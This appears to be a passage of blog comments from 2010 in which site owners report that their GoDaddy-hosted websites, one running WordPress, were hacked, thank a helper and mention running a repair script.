    Thanks for answering my question at http://badwarebusters.org/main/itemview/18157. I sent several emails to GoDaddy and they have fixed the problem on my website (Www.diolt.com). I wasn't sure how it happened..

    Thanks again

  89. Nicholas

    June 8, 2010

    Just had my GoDaddy hosted WordPress site hacked again as of 2:17pm pst. Please be aware that there is a new wave of attacks going on. I just ran the repair script and all seems ok…. reporting to GoDaddy right now.
